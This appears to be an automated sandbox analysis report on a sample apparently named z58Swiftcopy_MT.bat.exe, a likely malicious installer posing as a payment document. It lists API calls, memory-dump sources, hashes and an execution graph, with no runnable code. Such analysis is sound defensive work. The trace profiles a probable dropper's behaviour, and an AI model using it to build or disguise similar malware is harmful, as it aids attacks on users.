                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00402CB0
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00402CC0
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                                                      • API String ID: 1451636040-1158693248
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002348
                                                                                                                                                                                                                                        • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C5
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022DA
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E9
                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F7
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100022FE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696679274.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696753129.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696776514.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3730416702-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 004027E5
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004027F8
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2667972263-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00420D30,00420D30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040489C,000000DF,00000000,00000400,?), ref: 00404A1F
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00404A27
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00420D30), ref: 00404A3A
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: %u.%u%s%s$0B
                                                                                                                                                                                                                                      • API String ID: 3540041739-2032437577
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00401D98
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(0040B808), ref: 00401E1A
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3808545654-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?), ref: 00401D3F
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                                                                                                                                                                                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032FA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405A37
                                                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004032FA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405A40
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405A51
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A31
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                      • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C22
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C43
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$Enum
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 464197530-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharNextA.USER32(?,?,C:\,?,00405B36,C:\,C:\,762D3410,?,762D2EE0,00405881,?,762D3410,762D2EE0,00000000), ref: 00405AD8
                                                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 00405ADD
                                                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 00405AF1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharNext
                                                                                                                                                                                                                                      • String ID: C:\
                                                                                                                                                                                                                                      • API String ID: 3213498283-3404278061
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000002A8,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 00403809
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 0040381D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004037FC
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\nsb9327.tmp, xrefs: 0040382D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb9327.tmp
                                                                                                                                                                                                                                      • API String ID: 2962429428-1785074644
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00405163
                                                                                                                                                                                                                                      • CallWindowProcA.USER32(?,?,?,?), ref: 004051B4
                                                                                                                                                                                                                                        • Part of subcall function 004041A6: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041B8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,00420510,?,?,?,00000002,Call,?,004061C4,80000002), ref: 00405FC6
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,004061C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,00420510), ref: 00405FD1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                                                                                                      • String ID: Call
                                                                                                                                                                                                                                      • API String ID: 3356406503-1824292864
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422538,Error launching installer), ref: 00405761
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040576E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Error launching installer, xrefs: 0040574B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,762D3410,00000000,762D2EE0,0040382B,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 0040386E
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(006F7A48), ref: 00403875
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                      • String ID: Hzo
                                                                                                                                                                                                                                      • API String ID: 1100898210-2299914463
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E04,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,80000000,00000003), ref: 00405A7E
                                                                                                                                                                                                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E04,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,80000000,00000003), ref: 00405A8C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                                      • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                                      • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                                                                                                                                                                                                      • Instruction ID: 40098e637bf6d505f922d12736ff559178fc12fa7d0ee67292c12de19d06dc46
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6ED0A7729089702EF30393108C00B9F6A88CF16341F090062E480A7191C67C0C424BAD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.27696679274.0000000010000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.27696753129.0000000010003000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.27696776514.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                                                                                                                      • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                                                                                      • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA7
                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BBF
                                                                                                                                                                                                                                      • CharNextA.USER32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD0
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                                                                      • Opcode ID: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                                                                                                                                                                                                                                      • Instruction ID: c0798baac460c4c161baa60e5c3960505173fe7825234d44b9ee5cd82a8c1779
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29F06235105918AFCB02DFA9DD40D9EBBB8EF46350B2540B9F840FB211D674FE01ABA9

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:1.9%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                      Signature Coverage:1.3%
                                                                                                                                                                                                                                      Total number of Nodes:1648
                                                                                                                                                                                                                                      Total number of Limit Nodes:1
QueryPerformanceCounter 7566->7577 7568->7561 7570 33a720e7 7569->7570 7574 33a7210b 7570->7574 7576 33a720f6 7570->7576 7578 33a71eec 7570->7578 7572 33a7216d 7573 33a71eec 50 API calls 7572->7573 7572->7576 7573->7576 7574->7572 7575 33a71eec 50 API calls 7574->7575 7574->7576 7575->7572 7576->7564 7577->7568 7579 33a71ef7 7578->7579 7580 33a71f2a 7578->7580 7581 33a71f1c 7579->7581 7582 33a71efc 7579->7582 7621 33a72049 7580->7621 7603 33a71f3f 7581->7603 7584 33a71f12 7582->7584 7585 33a71f01 7582->7585 7595 33a723ec 7584->7595 7589 33a71f06 7585->7589 7590 33a7240b 7585->7590 7589->7574 7635 33a753e5 7590->7635 7731 33a73513 7595->7731 7600 33a72408 7600->7589 7601 33a7351e 7 API calls 7602 33a723f5 7601->7602 7602->7589 7604 33a71f4b 7603->7604 7749 33a7247c 7604->7749 7606 33a71f57 7606->7589 7607 33a71f52 7607->7606 7608 33a72041 7607->7608 7609 33a71f7c 7607->7609 7772 33a72639 IsProcessorFeaturePresent 7608->7772 7760 33a723de 7609->7760 7612 33a72048 7613 33a71f8b 7613->7606 7763 33a722fc RtlInitializeSListHead 7613->7763 7615 33a71f99 7764 33a746c5 7615->7764 7619 33a71fb8 7619->7606 7620 33a74669 5 API calls 7619->7620 7620->7606 7623 33a72055 7621->7623 7622 33a7205e 7622->7589 7623->7622 7624 33a720d3 7623->7624 7625 33a7207d 7623->7625 7626 33a72639 4 API calls 7624->7626 7824 33a7244c 7625->7824 7628 33a720da 7626->7628 7629 33a72082 7833 33a72308 7629->7833 7631 33a72087 7836 33a720c4 7631->7836 7633 33a7209f 7839 33a7260b 7633->7839 7641 33a75aca 7635->7641 7638 33a7351e 7715 33a73820 7638->7715 7640 33a72415 7640->7589 7642 33a72410 7641->7642 7643 33a75ad4 7641->7643 7642->7638 7644 33a75e08 11 API calls 7643->7644 7645 33a75adb 7644->7645 7645->7642 7646 33a75e5e 11 API calls 7645->7646 7647 33a75aee 7646->7647 7649 33a759b5 7647->7649 7650 33a759d0 7649->7650 7651 33a759c0 7649->7651 7650->7642 7655 33a759d6 7651->7655 7654 33a7571e 20 API calls 7654->7650 7656 33a759ef 7655->7656 7657 33a759e9 7655->7657 7659 33a7571e 20 API calls 7656->7659 
7658 33a7571e 20 API calls 7657->7658 7658->7656 7660 33a759fb 7659->7660 7661 33a7571e 20 API calls 7660->7661 7662 33a75a06 7661->7662 7663 33a7571e 20 API calls 7662->7663 7664 33a75a11 7663->7664 7665 33a7571e 20 API calls 7664->7665 7666 33a75a1c 7665->7666 7667 33a7571e 20 API calls 7666->7667 7668 33a75a27 7667->7668 7669 33a7571e 20 API calls 7668->7669 7670 33a75a32 7669->7670 7671 33a7571e 20 API calls 7670->7671 7672 33a75a3d 7671->7672 7673 33a7571e 20 API calls 7672->7673 7674 33a75a48 7673->7674 7675 33a7571e 20 API calls 7674->7675 7676 33a75a56 7675->7676 7681 33a7589c 7676->7681 7687 33a757a8 7681->7687 7683 33a758c0 7684 33a758ec 7683->7684 7699 33a75809 7684->7699 7686 33a75910 7686->7654 7688 33a757b4 7687->7688 7695 33a75671 RtlEnterCriticalSection 7688->7695 7691 33a757be 7692 33a7571e 20 API calls 7691->7692 7694 33a757e8 7691->7694 7692->7694 7693 33a757f5 7693->7683 7696 33a757fd 7694->7696 7695->7691 7697 33a756b9 RtlLeaveCriticalSection 7696->7697 7698 33a75807 7697->7698 7698->7693 7700 33a75815 7699->7700 7707 33a75671 RtlEnterCriticalSection 7700->7707 7702 33a7581f 7708 33a75a7f 7702->7708 7704 33a75832 7712 33a75848 7704->7712 7706 33a75840 7706->7686 7707->7702 7709 33a75a8e 7708->7709 7711 33a75ab5 7708->7711 7710 33a77cc2 20 API calls 7709->7710 7709->7711 7710->7711 7711->7704 7713 33a756b9 RtlLeaveCriticalSection 7712->7713 7714 33a75852 7713->7714 7714->7706 7716 33a7384b 7715->7716 7717 33a7382d 7715->7717 7716->7640 7720 33a7383b 7717->7720 7721 33a73b67 7717->7721 7726 33a73ba2 7720->7726 7722 33a73a82 5 API calls 7721->7722 7723 33a73b81 7722->7723 7724 33a73b99 TlsGetValue 7723->7724 7725 33a73b8d 7723->7725 7724->7725 7725->7720 7727 33a73a82 5 API calls 7726->7727 7728 33a73bbc 7727->7728 7729 33a73bd7 TlsSetValue 7728->7729 7730 33a73bcb 7728->7730 7729->7730 7730->7716 7737 33a73856 7731->7737 7733 33a723f1 7733->7602 7734 33a753da 7733->7734 7735 33a75b7a 20 API calls 7734->7735 7736 33a723fd 7735->7736 7736->7600 
